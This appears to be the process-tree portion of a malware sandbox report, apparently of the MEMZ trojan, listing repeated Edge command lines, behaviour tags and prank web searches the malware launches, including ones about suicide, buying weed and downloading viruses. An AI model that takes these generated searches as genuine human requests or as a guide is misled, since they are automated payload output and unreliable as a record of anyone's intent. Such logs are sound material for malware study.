C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2172,12496557060019419454,11471779789792218260,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=36 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7804 /prefetch:1 | 5⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2172,12496557060019419454,11471779789792218260,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=37 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6960 /prefetch:1 | 5⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2172,12496557060019419454,11471779789792218260,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=38 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=8024 /prefetch:1 | 5⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2172,12496557060019419454,11471779789792218260,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=39 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7852 /prefetch:15⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2172,12496557060019419454,11471779789792218260,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=40 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7272 /prefetch:15⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2172,12496557060019419454,11471779789792218260,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=41 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6872 /prefetch:15⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2172,12496557060019419454,11471779789792218260,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=42 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=8092 /prefetch:15⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2172,12496557060019419454,11471779789792218260,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=43 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7272 /prefetch:15⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2172,12496557060019419454,11471779789792218260,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=44 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=8544 /prefetch:15⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2172,12496557060019419454,11471779789792218260,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=45 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=8564 /prefetch:15⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2172,12496557060019419454,11471779789792218260,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=46 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=8320 /prefetch:15⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2172,12496557060019419454,11471779789792218260,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=47 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=8984 /prefetch:15⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2172,12496557060019419454,11471779789792218260,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=48 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=9208 /prefetch:15⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2172,12496557060019419454,11471779789792218260,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=51 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=9364 /prefetch:15⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2172,12496557060019419454,11471779789792218260,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=50 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=9396 /prefetch:15⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2172,12496557060019419454,11471779789792218260,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=49 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=9344 /prefetch:15⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2172,12496557060019419454,11471779789792218260,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=52 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=10480 /prefetch:15⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2172,12496557060019419454,11471779789792218260,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=53 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=9836 /prefetch:15⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2172,12496557060019419454,11471779789792218260,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=54 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=10084 /prefetch:15⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2172,12496557060019419454,11471779789792218260,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=55 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=10188 /prefetch:15⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2172,12496557060019419454,11471779789792218260,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=56 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=9140 /prefetch:15⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2172,12496557060019419454,11471779789792218260,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=57 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=8624 /prefetch:15⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2172,12496557060019419454,11471779789792218260,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=58 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=10784 /prefetch:15⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2172,12496557060019419454,11471779789792218260,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=59 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=8608 /prefetch:15⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2172,12496557060019419454,11471779789792218260,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=60 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=11252 /prefetch:15⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2172,12496557060019419454,11471779789792218260,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=61 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=11112 /prefetch:15⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2172,12496557060019419454,11471779789792218260,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=62 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=11244 /prefetch:15⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2172,12496557060019419454,11471779789792218260,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=63 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=10672 /prefetch:15⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2172,12496557060019419454,11471779789792218260,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=64 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=8384 /prefetch:15⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2172,12496557060019419454,11471779789792218260,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=65 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=9200 /prefetch:15⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2172,12496557060019419454,11471779789792218260,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=66 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=10700 /prefetch:15⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2172,12496557060019419454,11471779789792218260,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=67 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=8836 /prefetch:15⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2172,12496557060019419454,11471779789792218260,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=68 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=8212 /prefetch:15⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2172,12496557060019419454,11471779789792218260,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=69 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=10632 /prefetch:15⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2172,12496557060019419454,11471779789792218260,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=70 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=10576 /prefetch:15⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2172,12496557060019419454,11471779789792218260,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=71 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=10572 /prefetch:15⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2172,12496557060019419454,11471779789792218260,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=72 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=11400 /prefetch:15⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://google.co.ck/search?q=how+2+remove+a+virus4⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ffe3c2f46f8,0x7ffe3c2f4708,0x7ffe3c2f47185⤵
-
C:\Windows\SysWOW64\Taskmgr.exe"C:\Windows\System32\Taskmgr.exe"4⤵
- Checks SCSI registry key(s)
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://google.co.ck/search?q=minecraft+hax+download+no+virus4⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ffe3c2f46f8,0x7ffe3c2f4708,0x7ffe3c2f47185⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://google.co.ck/search?q=how+2+buy+weed4⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://google.co.ck/search?q=how+to+get+money4⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ffe3c2f46f8,0x7ffe3c2f4708,0x7ffe3c2f47185⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://google.co.ck/search?q=the+memz+are+real4⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ffe3c2f46f8,0x7ffe3c2f4708,0x7ffe3c2f47185⤵
-
C:\Program Files (x86)\Windows NT\Accessories\wordpad.exe"C:\Program Files (x86)\Windows NT\Accessories\wordpad.exe"4⤵
- Suspicious use of SetWindowsHookEx
-
C:\Windows\splwow64.exeC:\Windows\splwow64.exe 122885⤵
-
C:\Windows\SysWOW64\mmc.exe"C:\Windows\system32\mmc.exe" "C:\Windows\System32\devmgmt.msc"4⤵
- Suspicious use of SetWindowsHookEx
-
C:\Windows\system32\mmc.exe"C:\Windows\System32\devmgmt.msc" "C:\Windows\System32\devmgmt.msc"5⤵
- Drops file in System32 directory
- Drops file in Windows directory
- Checks SCSI registry key(s)
- Suspicious use of SetWindowsHookEx
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://google.co.ck/search?q=virus.exe4⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ffe3c2f46f8,0x7ffe3c2f4708,0x7ffe3c2f47185⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://google.co.ck/search?q=batch+virus+download4⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ffe3c2f46f8,0x7ffe3c2f4708,0x7ffe3c2f47185⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://google.co.ck/search?q=best+way+to+kill+yourself4⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ffe3c2f46f8,0x7ffe3c2f4708,0x7ffe3c2f47185⤵
-
C:\Windows\SysWOW64\Taskmgr.exe"C:\Windows\System32\Taskmgr.exe"4⤵
-
C:\Program Files (x86)\Windows NT\Accessories\wordpad.exe"C:\Program Files (x86)\Windows NT\Accessories\wordpad.exe"4⤵
- Suspicious use of SetWindowsHookEx
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://google.co.ck/search?q=batch+virus+download4⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ffe3c2f46f8,0x7ffe3c2f4708,0x7ffe3c2f47185⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://google.co.ck/search?q=how+to+remove+memz+trojan+virus4⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ffe3c2f46f8,0x7ffe3c2f4708,0x7ffe3c2f47185⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://google.co.ck/search?q=vinesauce+meme+collection4⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ffe3c2f46f8,0x7ffe3c2f4708,0x7ffe3c2f47185⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://google.co.ck/search?q=mcafee+vs+norton4⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://google.co.ck/search?q=is+illuminati+real4⤵
-
